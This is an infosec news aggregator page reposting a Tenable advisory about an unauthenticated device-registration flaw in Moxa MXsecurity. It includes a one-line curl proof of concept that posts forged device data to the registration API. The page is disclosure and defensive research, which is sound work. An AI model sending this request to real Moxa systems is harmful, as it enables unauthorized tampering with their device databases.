all InfoSec news logo
all InfoSec news - Your InfoSec news aggregator
Log in Sign up
all InfoSec news

Moxa MXsecurity Unauthenticated Device Registration

Add to bookmarks
Sept. 5, 2023, 1:14 p.m. | Jimi Sebree

Tenable Research Advisories www.tenable.com

Moxa MXsecurity Unauthenticated Device Registration

A security issue regarding improper access controls has been discovered in Moxa MXsecurity V1.0.1-23021705. It allows an unauthenticated remote attacker to register/add devices via the nsm-web application. This pollutes the MXsecurity sqlite database and the nsm-web UI.

Proof of Concept




curl -k -H 'Content-Type:application/json' -d '{"mac":"11:11:11:11:11:11", "serialNumber":"1234", "modelName":"aaa", "hostname":"device_1", "firmwareVersion":"1.1", "location":"location_1"}'  'https:///api/v1/devices/register'


Jimi Sebree
Tue, 09/05/2023 - 09:14

access access controls application attacker concept controls database device devices issue moxa nsm proof register registration security sqlite sqlite database unauthenticated web web application

Visit resource

More from www.tenable.com / Tenable Research Advisories

Fluent Bit Memory Corruption Vulnerability 2 weeks, 1 day ago | www.tenable.com
corruption memory memory corruption vulnerability
Cross-Site Scripting in WordPress RSS Aggregator Plugin 2 weeks, 4 days ago | www.tenable.com
cross-site plugin rss scripting +1
Solidus Stored Cross-Site Scripting 2 weeks, 4 days ago | www.tenable.com
cross-site inject javascript malicious +8
CyberPower PowerPanel Enterprise Power Device Network Utility Multiple Vulnerabilities 3 weeks, 2 days ago | www.tenable.com
access account action admin +42
Delta Electronics DIAEnergie CEBC.exe Multiple Vulnerabilities 3 weeks, 5 days ago | www.tenable.com
cve cve-2024 cvss delta +11
Approach.App Multiple Vulnerabilities 1 month, 1 week ago | www.tenable.com
app application exploitation management +9
Karros Technologies Authentication Bypass 1 month, 1 week ago | www.tenable.com
authentication authentication bypass bypass technologies
Ivanti Avalanche WLAvalancheService.exe Unauthenticated Heap-based Buffer Overflow 1 month, 2 weeks ago | www.tenable.com
avalanche big buffer buffer overflow +12
Path Traversal Affecting Multiple CData Products 1 month, 3 weeks ago | www.tenable.com
application attachment cookie date +14

Jobs in InfoSec / Cybersecurity

Post a Job Search Talent

CyberSOC Technical Lead

@ Integrity360 | Sandyford, Dublin, Ireland
View on infosec-jobs.com

Cyber Security Strategy Consultant

@ Capco | New York City
View on infosec-jobs.com

Cyber Security Senior Consultant

@ Capco | Chicago, IL
View on infosec-jobs.com

Sr. Product Manager

@ MixMode | Remote, US
View on infosec-jobs.com

Corporate Intern - Information Security (Year Round)

@ Associated Bank | US WI Remote
View on infosec-jobs.com

Senior Offensive Security Engineer

@ CoStar Group | US-DC Washington, DC
View on infosec-jobs.com